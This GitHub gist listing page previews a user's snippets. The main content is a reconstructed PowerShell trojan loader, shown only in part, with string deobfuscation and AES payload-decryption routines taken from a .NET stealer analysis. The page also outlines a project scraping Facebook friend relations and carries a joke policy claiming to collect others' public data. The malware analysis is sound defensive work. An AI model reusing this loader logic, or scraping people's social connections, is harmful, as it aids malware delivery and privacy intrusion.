Skip to content

Instantly share code, notes, and snippets.

View hUwUtao's full-sized avatar
😔
being vibecoded out of no free time

stdpi hUwUtao

😔
being vibecoded out of no free time
View GitHub Profile
@hUwUtao
hUwUtao / 32.js
Created January 21, 2024 13:11
simai explode
copy(
[...document.querySelectorAll("table")]
.slice(1, -3)
.flatMap((d) =>
[...d.querySelector("tbody").querySelectorAll("tr")].map((r) =>
[...r.querySelectorAll("td")].map((r) => r.innerHTML),
),
)
.map((r) =>
r[0].startsWith("<a")
@hUwUtao
hUwUtao / README.md
Last active January 11, 2024 17:37
Các câu lệnh mycommands armstand config của Team Fuho

Các lệnh sửa armorstand thủ công

  • Dành cho server chạy MyCommands

Lưu ý

Lệnh sẽ lựa chọn thực thể armor_stand gần nhất, tối đa 1, trong bán kính giới hạn 1

Các lệnh

@hUwUtao
hUwUtao / chat.txt
Created January 7, 2024 16:09
drunk_talk about programming
A — Hôm nay lúc 22:54
I ain't learning a React framework 💀
archlinux 6.4.12-zen1-1-zen — Hôm nay lúc 22:55
vite is not a framework!
it is a bundler
React is not a framework!
React is a library
Laravel is a framework!
NextJS is a framework
@hUwUtao
hUwUtao / README.md
Last active November 25, 2023 17:19
Project REL

Project REL

This page constantly update progress of this project. Well, basically scraping Facebook relative friend into a cool format

Patch 1 - Basic Regex bd

endpoint

https://mbasic.facebook.com/~/friends
@hUwUtao
hUwUtao / monokai.json
Created November 4, 2023 17:04
Monokai Classic (vscode theme for Vencord's ShikiCodeblocks)
{"name":"Monokai Classic","type":"dark","author":"Monokai","uuid":"80f15e1b-1789-50a6-8010-70c32bb81b6d","colorSpaceName":"sRGB","colors":{"activityBar.activeFocusBorder":"#e6db74","activityBar.background":"#161613","activityBar.border":"#161613","activityBar.foreground":"#c0c1b5","activityBar.inactiveForeground":"#57584f","activityBarBadge.background":"#e6db74","activityBarBadge.foreground":"#272822","badge.background":"#e6db74","badge.foreground":"#272822","banner.background":"#3b3c35","banner.foreground":"#c0c1b5","banner.iconForeground":"#c0c1b5","breadcrumb.activeSelectionForeground":"#fdfff1","breadcrumb.focusForeground":"#c0c1b5","breadcrumb.foreground":"#919288","button.background":"#3b3c35","button.foreground":"#c0c1b5","button.hoverBackground":"#57584f","button.secondaryBackground":"#3b3c35","button.secondaryForeground":"#c0c1b5","button.secondaryHoverBackground":"#57584f","button.separator":"#272822","charts.blue":"#66d9ef","charts.foreground":"#fdfff1","charts.green":"#a6e22e","charts.lines":"#6e7
@hUwUtao
hUwUtao / README.md
Last active November 2, 2023 12:58
The FISL Assembly

FISL - Flat Instruction Set List

  • Is a language to define the list of instruction. It is extendable, but not dedicated to any platform
  • Is a language that similar to LISP, the way it describe the code and operators through syntax
  • It is compact to read. Trailing tab/space is optional. Syntax is limited to ASCII, even better, it is only [a-zA-Z0-9.\s]
  • It's design is not intended for automatic/smart expression parsing.
  • It is a scalar, but neat to see that any object is statically typed, allocated and limbo between manual and automated memory management. Worse: it ignore any stack dead, because it is synchronous by the design
  • Define a number, then the binary, so it is the ROM

Brief summary

@hUwUtao
hUwUtao / Class0.cs
Created September 19, 2023 16:21
.NET Stealer Debunked. Stage 3 (Cleanup obfuscation)
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
namespace EdvgVD
{
// Token: 0x02000002 RID: 2
internal class Class0
{
@hUwUtao
hUwUtao / loader.ps1
Last active September 19, 2023 17:53
.NET trojan based on powershell, batch and .net, loader reconstructed
# Deobfuscate strings
$DecodeBase64 = {param($in) [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($in))}
$YdDd = 'GldVHetldVHCurldVHreldVHntPldVHroldVHceldVHssldVH'.Replace('ldVH', '').Split('|')
# Deobfuscate function names
$DecryptAES = 'ccbSO'
$DecompressGzip = 'FYIcv'
# Functions to decrypt and decompress code
function ${DecryptAES}($payload){
$aes = [System.Security.Cryptography.Aes]::Create()
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
@hUwUtao
hUwUtao / README.md
Created September 4, 2023 15:59
UTTP Proposal 01

UTTP

Which stand for Universal Text Transportation Protocol, is an alternative for HTTP, which was designed to empower routers. The proposal is compose of 3 noticible modification from HTTP, which is: Inlined request header, Path payloads and Path encoding.

But first

Why HTTP is bad for performance? It is very extendable though, but the fact that HTTP headers define line by line make the important being less important. Take example, this is a basic HTTP request (well most of the time, with forced header to make routers work)

@hUwUtao
hUwUtao / README.txt
Created August 29, 2023 16:31
The freepolicy
DO WHAT THE F*** YOU WANT PRIVACY POLICY
COPYLEFT 2023 By stdpi
1. The owner of this policy wont be affected by this policy, nor the legal regard this policy
2. you must accept that:
- We have full access to your public data, public data of people that have any relatives with you publicly
- Permit us to collect public data of anyone else (in fact this only apply to your public friend relatives)
3. we promise that we
- Wont share collected data with anyone (exept you)
- Must return all collected data to you (the user)